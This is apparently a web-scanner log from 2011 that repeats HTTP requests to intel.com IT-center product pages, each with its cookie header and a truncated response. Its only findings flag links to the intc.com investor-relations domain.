GET /itcenter/products/atom/index.htm?iid=subhdr+itc_atom HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37679
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /itcenter/products/core/core_vpro/index.htm?iid=gg_work+home_core-vpro HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47688
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... rotection Agency, that relies upon all of the system's components, including processor, chipset, power supply, HDD, graphics controller and memory to meet the specification. For more information, see <a href="http://www.energystar.gov/index.cfm?fuseaction=find_a_product.showProductGroup&pgw_code=CO" target="_blank">www.energystar.gov/index.cfm?fuseaction= find_a_product.showProductGroup&pgw_code=CO</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]... <!-- wf - Crazyegg Heatmap --> <script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/3310.js"></script> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/products/core/index.htm?iid=subhdr+itc_core HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39625
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/products/index.htm?iid=gg_prod-en_US+it_prod HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36089
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/products/itanium/index.htm?iid=subhdr+itc_itanium HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37004
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/products/xeon/index.htm?iid=subhdr+itc_xeon HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44174
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/system/client/index.htm?iid=subhdr+itc_client HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40329
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/system/internet_device/index.htm?iid=subhdr+itc_intdev HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38205
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/system/networking/index.htm?iid=subhdr+itc_networkdev HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42928
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/system/server/index.htm?iid=subhdr+itc_server HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; 